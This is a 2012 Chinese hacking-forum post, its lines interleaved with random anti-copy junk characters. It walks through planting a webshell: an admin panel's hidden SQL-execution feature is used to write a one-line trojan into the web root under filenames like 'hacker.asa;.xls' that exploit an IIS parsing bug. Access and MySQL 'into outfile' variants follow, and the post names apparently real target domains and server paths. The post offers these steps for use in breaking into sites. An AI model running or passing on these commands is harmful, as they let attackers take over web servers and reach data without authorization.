好不容易进了后台,发现啥上传啊。备份啊多木有。
6 q, F! U9 Q" e3 hwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
J: o5 }6 d& S- P0 D! a) \& n文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
( E' ^; t A4 W然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
2 X$ w0 U o3 Z1.create table cmd (a varchar(50))
4 X8 N2 l' t; g. h9 w) i+ a2 _! U) @2.insert into cmd (a) values (‘‘)' ~2 v C- T- ~3 i5 T8 J2 |. H; T
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
2 n' V M2 s2 {& @(把表cmd的内容导出为物理路径的一个EXCEL文件)7 U. X$ m% H+ t x. ?5 Y
4.drop table cmd# R, z' V2 v& ^$ @; S
利用IIS的BUG成功拿到了WEBSHELL。
6 T5 T6 s0 X9 c1 Z2 t8 T( Y/ c
$ ?" u+ q' k0 _& l4 q, Z! y直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
8 d( Y/ L, T* S9 Z. ]% \2 l% R" A- g& k* \8 a
SQL语句意思解释:, m( Z- V; K3 t, C5 U) I2 s
第一句; _5 D9 r4 I6 d* |- D" B5 x% r
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
; q" Z# j5 c* O; p- V' ^" \7 d6 f0 Z7 c% V Z
第二句+ N4 ^3 |7 S& p# D- W" E
在表cmd的a字段插入一句话木马
! F; B, Z& V. A [& E y 第三句
% H5 j) M: c6 j; s 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
4 [( r; \% A' r: I& N: a' D- ~% H! H/ P/ c
第四句
0 \3 [8 }6 N2 O 删除建立的cmd表
+ h, K" D( j! F% c: n) `+ r# w0 f t1 t) ]
以下内容为测试:% V3 G4 a; Y D. D3 K4 p$ @" ?- {3 T9 J
Access利用后台SQL执行命令功能导出WebShell:
: S8 P0 Q6 m" F3 B6 \( x 这个更简单:' \. y0 C x/ ?' ^ I
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
' c" ^' e( x1 f( {4 D1 Y 或者
f: x+ o6 g# l5 M5 i [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
. y: K/ G# T" B% z
7 ?; u# h' t5 r/ l1 ]. R$ ` 后台有执行SQL语句功能(vote为已知表段)! q/ @! P# Y4 ?6 H2 S, `; C
希望对大家有所帮助拿shell的又一个思路
0 `& m9 J, P3 T |
发表于 2012-9-13 17:53:58
收藏
支持
反对